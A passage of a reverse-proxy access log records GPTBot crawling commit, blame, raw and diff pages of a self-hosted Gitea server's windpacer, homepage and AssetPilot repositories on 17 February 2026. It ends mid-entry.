"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:14:24:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 10477] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:14:24:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 10831] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:14:24:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/index.html" [Client 74.7.227.38] [Length 23744] [Gzip 11.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/index.html" +[17/Feb/2026:14:24:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html?display=rendered" [Client 74.7.227.38] [Length 14168] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html" +[17/Feb/2026:14:24:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977?show-outdated=&style=unified&whitespace=ignore-change" [Client 74.7.227.38] [Length 115833] [Gzip 13.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977" +[17/Feb/2026:14:24:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584?show-outdated=&style=unified&whitespace=ignore-change" [Client 74.7.227.38] [Length 16173] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584" +[17/Feb/2026:14:24:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 10420] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:14:24:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 10421] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:14:24:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 162] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:14:24:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 162] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:14:24:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/main.py" [Client 74.7.227.38] [Length 9187] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/main.py" +[17/Feb/2026:14:24:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/main.py" [Client 74.7.227.38] [Length 9187] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/main.py" +[17/Feb/2026:14:24:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977?show-outdated=&style=unified&whitespace=ignore-all" [Client 74.7.227.38] [Length 115841] [Gzip 13.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977" +[17/Feb/2026:14:24:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83?show-outdated=&style=unified&whitespace=ignore-change" [Client 74.7.227.38] [Length 51955] [Gzip 9.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83" +[17/Feb/2026:14:24:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977?show-outdated=&style=unified&whitespace=ignore-eol" [Client 74.7.227.38] [Length 115918] [Gzip 13.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977" +[17/Feb/2026:14:24:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?show-outdated=&style=unified&whitespace=ignore-change" [Client 74.7.227.38] [Length 212458] [Gzip 13.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8" +[17/Feb/2026:14:24:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977?show-outdated=&style=unified&whitespace=show-all" [Client 74.7.227.38] [Length 115886] [Gzip 13.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977" +[17/Feb/2026:14:24:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?show-outdated=&style=unified&whitespace=ignore-change" [Client 74.7.227.38] [Length 387770] [Gzip 16.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0" +[17/Feb/2026:14:24:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977?show-outdated=&style=split&whitespace=ignore-change" [Client 74.7.227.38] [Length 130636] [Gzip 16.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977?show-outdated=&style=unified&whitespace=ignore-change" +[17/Feb/2026:14:24:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 176797] [Gzip 4.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project" +[17/Feb/2026:14:24:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 176768] [Gzip 4.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project" +[17/Feb/2026:14:24:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 176794] [Gzip 4.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project" +[17/Feb/2026:14:24:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/wiki" [Client 74.7.227.38] [Length 7375] [Gzip 2.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/forks" +[17/Feb/2026:14:24:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977?show-outdated=&style=split&whitespace=ignore-all" [Client 74.7.227.38] [Length 130618] [Gzip 16.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977?show-outdated=&style=unified&whitespace=ignore-all" +[17/Feb/2026:14:24:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 10466] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/main.cpp" +[17/Feb/2026:14:24:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977?show-outdated=&style=split&whitespace=ignore-eol" [Client 74.7.227.38] [Length 130663] [Gzip 16.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977?show-outdated=&style=unified&whitespace=ignore-eol" +[17/Feb/2026:14:24:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 10464] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/main.cpp" +[17/Feb/2026:14:24:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 10466] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/main.cpp" +[17/Feb/2026:14:24:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...main?show-outdated=&style=unified&whitespace=ignore-change" [Client 74.7.227.38] [Length 558416] [Gzip 13.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...main" +[17/Feb/2026:14:24:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 9889] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom6.png" +[17/Feb/2026:14:24:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 659888] [Gzip 25.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/controller-cpp.md" +[17/Feb/2026:14:24:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 659889] [Gzip 25.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/controller-cpp.md" +[17/Feb/2026:14:25:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 659892] [Gzip 25.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/controller-cpp.md" +[17/Feb/2026:14:25:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 10170] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/controller-cpp.md" +[17/Feb/2026:14:25:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 10191] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/controller-cpp.md" +[17/Feb/2026:14:25:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 10193] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/controller-cpp.md" +[17/Feb/2026:14:25:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 468113] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/controller-cpp.md" +[17/Feb/2026:14:25:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 468113] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/controller-cpp.md" +[17/Feb/2026:14:25:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 468113] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/controller-cpp.md" +[17/Feb/2026:14:25:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 9890] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom1.png" +[17/Feb/2026:14:25:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 9890] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom5.png" +[17/Feb/2026:14:25:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 9890] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom3.png" +[17/Feb/2026:14:25:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 9889] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom2.png" +[17/Feb/2026:14:25:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 9889] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom4.png" +[17/Feb/2026:14:25:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-6.conf" [Client 74.7.227.38] [Length 9946] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-6.conf" +[17/Feb/2026:14:25:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-7.conf" [Client 74.7.227.38] [Length 9943] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-7.conf" +[17/Feb/2026:14:25:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-1.conf" [Client 74.7.227.38] [Length 9945] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-1.conf" +[17/Feb/2026:14:25:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-4.conf" [Client 74.7.227.38] [Length 9947] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-4.conf" +[17/Feb/2026:14:25:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-2.conf" [Client 74.7.227.38] [Length 9939] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-2.conf" +[17/Feb/2026:14:25:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13343] [Gzip 4.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build" +[17/Feb/2026:14:25:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/__pycache__" [Client 74.7.227.38] [Length 10233] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; 